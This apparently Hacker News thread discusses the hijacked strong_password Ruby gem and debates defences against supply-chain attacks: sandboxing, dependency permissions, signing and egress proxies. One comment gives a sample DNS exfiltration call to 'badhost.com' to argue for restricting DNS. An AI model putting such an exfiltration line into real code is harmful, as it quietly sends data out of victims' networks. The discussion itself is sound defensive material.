As already hypothesized in the comments I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.
I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. I simply forgot to rotate out that old password there as a result which is definitely my bad.
Since being notified and regaining ownership of the gem I've:
1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.
2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.
3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.
Thanks for sharing the info!
The modified gem downloaded and executed code stored in a editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate just by browsing any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. Plus, it would ping the attacker's server to let them know your webserver was infected.
Nasty, nasty stuff.
To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.
This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).
This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?
How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.
This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version release without github repo changes, maintainer email on haveIbeenpwned and no password change since that date, etc).
> a [...] ruby gem was hijacked and used to infect production webservers with malware
I wasn't aware of any reports of this being exploited in production. Do you have an example?
I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting.
no, I don't have any examples, but then, it's not likely we're going to hear of any - anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.
But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.
Does it, though?
If you want this functionality, I recommend not using it as-is, given the security vuln GitHub is currently reporting. Rather, anyone has my permission to copy the code verbatim into your project. It's a pretty simple gem.
Is the algorithm deficient?
To me that looks like code that indeed checks the strength, so I must be missing something.
The writer of that code at least needs to read https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpubli... one more time.
> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.
The way I see it, there are a few options:
1. The rubygem was transferred by ruby staff to this account.
2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.
3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.
That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.
The lack of funding for foundational parts of many popular ecosystems (e.g. NPM, PyPI, Rubygems) never ceases to surprise me.
If the goal of the project is adoption than do not ignore that group.
as to losing adoption, that would only happen if
a) there were other options with better security, and given that npm, PyPI and others have had similar problems, there probably aren't
b) Developers would actually move ecosystem due to package manager weaknesses. given that hasn't happened with any of the previous instances of supply chain attacks (and this has been going on for 5+ years now) I don't think so.
As one example, rubygems was compromised in 2013 https://news.ycombinator.com/item?id=5139583 did you or anyone else stop using it as a result?
Obv. as a security person I'd say they should prioritise security things like audits and improved Authentication requirements for gem owners, but realistically sounds like just keeping the lights on is pretty expensive.
4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntary.
That incident highlighted a broadly systemic problem with how these kinds of packages are maintained, it was not a case of "one bad maintainer".
But it is really interesting to see the atmosphere around this systemic problem. Maintainers don't realize that transferring ownership can be putting users in danger, they'd rather transfer the ownership to a random stranger than mark the package abandoned, then they deny it was ever so serious and ask for more money, and their friends and followers rise up to protect them, without ever addressing the central issue, yeah, that's a systemic problem.
For example a "strong_password" library should only by given "CPU compute" permissions, no I/O.
But even with this, the problem will be like we see on phone, popular libraries will require all the permissions.
You'll want to install React, and React + it's 100 dependencies will request everything.
That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sounds like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.
Yeah, logging would be tricky...
Maybe a "logging" capability could be created. Separated from other I/O.
Such a capability would be weird, and nonstandard, and messy, cutting across several several abstraction layers. But if pulled off, it might be worth the effort.
Isn't this the sort of thing type inference is made for? Along with return types, functions have an io type if they're marked (std lib) or if they contain a marked function. Otherwise they have the pure type.
This isn’t to say that it’s a bad idea but there are a ton of details which get annoying fast. I know the Rust community was looking into the options after the last NPM hijack was in the news but it sounded like it’d take years to make it meaningfully better.
Maybe that's not such a bad idea. This "strong_password" thing is written in Ruby, a few milliseconds delay is probably not noticeable anyway and vastly preferable given the security implications.
It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.
For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.
Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.
With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.
It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.
Which means you would get warnings on pretty much any functional upgrade of most dependencies, which would make the whole system useless from a security point of view.
Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.
Why not? I've often done upgrades with the sole purpose of replacing questionable, hand-written code with external dependencies I've discovered that do the same thing, but better (more features, more tests, more eyes on the code, more fixed issue reports than my often-closed-source code). From string parsing to networking, this happens a lot. The external contracts of my libraries don't change a bit, so why waste a major version? "I'm using someone else's code instead of what I YOLO'd myself" seems like a poor reason to rev a package version--and even if it's not, where do you draw the line? Cribbing code from StackOverflow?
This _should_ be achievable with Go.
On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.
On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.
If you're really worried, then you still could go over your entire tree and override the default settings. But there's nothing that would mean you would be required to do that.
People are thinking about this using the phone/website model, where permissions are only applied at one level. With dependencies, whatever giant framework that you're pulling in could be using the same permissions system to secure its own dependencies, which would make you significantly safer.
Under the current system, you have to hope that none of the authors in your dependency chain make a mistake and get compromised. If everybody can sandbox anything, then you only have to hope that most of those authors don't make a mistake.
If somebody attaches malware to a dependency of a dependency, and if even one person along that chain is following best practices and saying, "yeah, I don't think this needs a special permission", then they've likely just prevented that attack from affecting anyone else deeper down the dependency chain.
Sandboxing in package managers is something that could actually scale pretty well; much better than it does for websites/phones/computers.
High-level (i.e. consuming a lot of dependencies at a lot of levels) tools would simply apply a "allow everything" dependency policy rather than deal with tons of issue reports from people who wanted to import the high-level library in a less-than-root-permissioned project.
Additionally, lots of upgrades do increase the dependency surface. Resolving local usernames is a pretty fundamental thing a lot of dependencies would need. Now consider the libc switch from resolving names via /etc/passwd to resolving from multiple sources (including nslcd, a network/local-network service). If every dependency up the tree adopted a "lowest possible needed IO surface" permission model and then that change happened, it would be hell to pay: maintainers would take the shortest path and open up too many permissions; maintainers wouldn't upgrade and leave some packages trapped in a no-man's-land; or maintainers would give up on pulling in prone-to-changing-permissions dependencies, leading to even more fragmentation.
Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.
The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring library authors of libraries that do require those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.
It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).
Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.
We need a solution which also works for most used languages, JS/C++/Java/Python..., which suggests that it should be done at a higher level, maybe with OS involvement somehow.
Unfortunately, it seems like it's been removed since Ruby 2.1: https://bugs.ruby-lang.org/issues/8468
Unfortunately, the architecture was too complex for most developers and fell to the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.
EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...
Kudos to you!
This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.
My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.
And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.
I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.
But if you had the key cached, and it changed, you’d probably freak out.
>This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks.
You’ve just isolated the impact of these attacks to new installs, how is that not significant?
Not in the servers-as-cattle age. By default, a rebuilt server will have a new key. Otherwise, you'd have to save the server SSH key in your configuration/build files, and then you've moved what you have to protect to the source control of the servers, and probably exposed that secret key to many more people and developers than you would have done by leaving the key on the server.
Jumping one stratum forward, with hosted k8s you don't even know the host's key; you do everything via HTTPS and the almost globally accepted list of secure CA:s.
If you're using VMs, keys change all the time. Maybe some people here are good about security and would freak out, but I'm thinking about workplaces I've been at, and that's not a typical attitude for developers that I know. If I set up a VM at work and changed the keys on it, I doubt my coworkers would even ask me about it when they saw the warning.
And I'm literally right there -- they're not going to file a Github issue for a developer they've never met asking why the key changed and then stop working until they get a response.
To push the point even more, how many people on here actually wrote down the SSH fingerprint that they got the first time they connected to a remote machine? When you got a new laptop, did you transfer the keys over, or did you just blindly reconnect to every VM again?
Package managers are meant to help you manage installs on multiple machine, so it's not just the first time you use a package -- it's every time you do a fresh clone the repository, it's every time you throw away your cache and do a new reinstall over the network.
And it's based on this idea that even when doing an update, package managers and developers won't just blindly hit OK if they get a notification that a key changed, which I just don't think is the norm, even in technical circles.
Less than a week ago, a server of mine rebooted due to an unannounced power outage. This particular server just stores some backups and didn’t have proper monitoring, I didn’t know it had rebooted. Normally mere unannounced power outages have me shitting bricks, switching hosts or at least extensively verifying the pre-boot environment.
Trying to SSH into the box I received the host key mismatch error because the server boots into dropbear for LUKS. It took me a few minutes to figure out what had happened, but until I did, I definitely fully assumed that my host was up to something really bad.
Every time. Well, "freak out" is a strong phrase. But I do check with knowledgeable member of team before continuing.
For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.
I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).
As in all forms of engineering there are, of course, no absolutes, only trade-offs to be made.
The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills. Moving too slowly can be fatal to the business. It’s a tricky balance. Signing isn’t perfect, but it can improve some aspects of some balances people strike.
Packaging and distribution of libraries takes effort to do it properly, so they're only done properly if it's sufficiently centralized. If you have to import fifty third-party wheels, then it's unavoidable that some or most of these wheels can't be managed properly, but it's quite feasible to have a single (or three) well-managed third-party package that provides a hundred wheels so that you don't have to reinvent them. If the strong_password gem was integrated in (for example) Rails and managed/released by the same team with the same processes, then this risk would be avoided. If instead of a dozen separate gems with every functionality separate you'd have a single bundle of varied functionality like in Java there's Guava or Appache Commons, then that bundle can handle release management in a way that each separate gem developer can not.
If you want to have reliable dependencies then you eithery have to choose only dependencies with buraucratic and pedantic release governance, or manage/audit each dependency yourself (as the author of the original article seems to have done). In ecosystems where it's reasonable to have serious projects that have 0-3 distinct (but large) external dependencies this works easily; in ecosystems where you have dozens or even a hundred dependencies, that overhead is impractical for most projects.
That's a false dichotomy. There are middle grounds which can and do work at scale:
Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).
Carefully monitor changed application/network behavior after upgrades.
Devote a manageable, non-zero amount of time to reading/finding security bulletins or security incidents on your most-heavily-used dependencies.
Pay attention to issue reports and prioritize any with possible security implications.
...and (at a slightly larger scale) hire, empower, and compensate people to do those kinds of things in a systematic, regular way.
Seriously, security engineering isn't served well by "ZOMG NPM is garbage we must switch to $megaframework and pray that their release engineers get everything right" hysteria and absolutism. There are effective, moderate strategies that help with these issues every day.
1) only upgrade dependencies “knowingly and deliberately” (as the author of this article did). What does this mean if not auditing the upgrades? Just upgrading more rarely (e.g. because you know you need a specific feature or bug fix), but still auditing them? By waiting to upgrade, the diff will be vastly larger and performing an audit to “knowingly” upgrade will be much more difficult.
2) detecting a breach after you’ve already installed an attacker’s code onto your servers, via active monitoring or by hoping someone else does active monitoring or auditing and reports the issue to you or to a central authority.
#1 as a “middle ground” doesn’t seem too different from the post you responded to. #2 is what most projects seem to rely on - hope someone else finds the problem and reports it, and that they don’t get hit too hard in the meantime.
Whereas in some other ecosystems, you have to go get each wheel individually from a different person. There are certainly reasons why each ecosystem evolved the way it did, but I don’t think it’s impossible that this sort of stuff could centralize more in the future, especially as it becomes more clear what should be “batteries included” or what things are actually needed and used by the community.
Sure, but even here we see you modulating your position from “only Spring” to “Spring, Guava, and Apache Commons”, tripling the number of dependencies you’re willing to admit.
Really what it boils down to is, you’re saying what I’m saying. Declaring absolutely “this dependency, and no others” is silly — rather, it’s a question of trade-offs, and you feel that in your usecases trading off say, 3 or 4 large dependencies is worth the velocity gain. Nobody is arguing with that.
Fewer, larger, carefully considered dependencies is a relational set of trade-offs to make.
The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.
As an aside: just because someone made their code available doesn't mean it's good or that it solves all your edge cases. Getting those fixed also takes up time.
Sure. I was in no way advocating “JS-style, 5 line microlibs Uber Alles”, merely pointing out that there’s a clear trade-off between dependencies and velocity that there’s no silver bullet for.
There’s absolutely nothing wrong with OP saying “we can afford to make Spring our only dependency”, but there’s also nothing wrong with saying “we need actor-based concurrency and the business will be dead before we roll are own, let’s bring in Akka”, “we need to deal with time and spending 40 hours a month keeping up with every legislature on the planet’s timezone-related lawmaking doesn’t pay the bills, bring in JodaTime”, etc.
It’s engineering; these trade-offs should of course be carefully considered (is_even should fail most any sane consideration), but it’s a bit silly to suggest they can just be avoided entirely by businesses that have to make money to pay the bills.
Again, signing helps when you need to make those trade-offs. There are no absolutes here.
JodaTime is now deprecated in favor of Java 8 time (JSR-310). Akka is an official library from Typesafe/Lightbend. In a JVM ecosystem, you can get this kind of stuff directly from a supported corporate vendor. You can even easily pay them for support if you want. And a lot of times stuff even gets standardized through the JSR process.
Now, if you’re in a pre-Java 8 world and you need JodaTime, sure it makes sense to bring it in, not just use only Spring. But eventually that software library gets recognized as necessary to the ecosystem and standardized, and you no longer have to rely on yet another 3rd party for it.
Whereas in another ecosystem, JodaTime might just keep existing, maybe even alongside the bad default language library, and everyone has to always be told to go get this third party dependency if you want to do things right.
Yeah. I didn’t claim otherwise? Like I said, there are only trade-offs here. You can gain a ton of velocity if you abstract it all out to a file of 50,000 “magic words”; but obviously then your exposure to these issues is enormous.
Trade-offs are like that.
> I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.
Eh, to the extent that I get any such feeling, I think it’s mostly a completely false sense of security. I did some stuff in a C++ codebase that was fully developed that way, and did the ol’ “hunt, unzip, and compile” for some boost libs. I didn’t audit the source. It being boost C++ god knows if I’d even have been able to recognize a heavily template-metaprogrammed exploit.
If boost’s account had been compromised I’d have been every bit as fucked as people who use this gem were. Supply chain attacks are dangerous regardless. All you can do is try to balance your exposure vs your time spent on solving problems that don’t pay the bills vs those that do.
I wasn't so much thinking about avoiding vulns due to added scrutiny as much as issues with updated libs, since most build processes pull gems, etc when deploying or rebuilding a container; I don't think many vendor the gems. Typically you'd ship the actual files you unzipped as opposed to letting the package manager grab the most recent version within version spec.
Automating a “bundle update” to pull latest versions within spec and update the lockfile would be odd to my experience. You’d typically do that manually, (hopefully, if you’re competent) look at what changed, and retest (semver is great as long as everyone perfectly anticipates & categorizes every change’s impact. In the real world, however, ....) rather than blindly just letting a deployment run whatever.
Bad devs can do the stupidest thing imaginable in any system, though, so I don’t doubt this is out there.
And the more mistakes you make, pissing off your users (or worse, compromising their data because you thought you could roll-your-own of some security critical dependency you ditched).
Yes, the situation sucks. I just looked at the frontend of a relatively small app we use for administration, and it depends on almost 5000 node modules versions. But this problem needs to be dealt with as soon as possible, and I don’t think that a fundamental change in development culture—making everything harder for developers in the process—is going to help.
With a dependency forest that large, it's small wonder that not more JS projects aren't compromised by bad dependencies...
Sure, as 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them hsms they use to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.
It's staggering the lack of consideration given to basic security by what should be competent software engineers.
You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked down proxy server, and allow only specific domains there. This makes it easy to setup whatever rules you want, allowing entire domains, or only specific hosts. And it gives you a convenient place to log entries before you lock them down.
This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.
Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.
Also, most of this traffic is still unencrypted and dig'ging strange severs is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.
Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.
Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.
Thank you for your service sir.
Does the upcoming builtin package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub and that associate the commit hash in the metadata in some way?
If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?
Do you only use thoroughly audited software projects? How do you manage that?
This also heavily encourages microservices since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well but relatively few apps were designed that way and that general class of missing things which weren’t supposed to work is notoriously easy for even experienced teams to miss.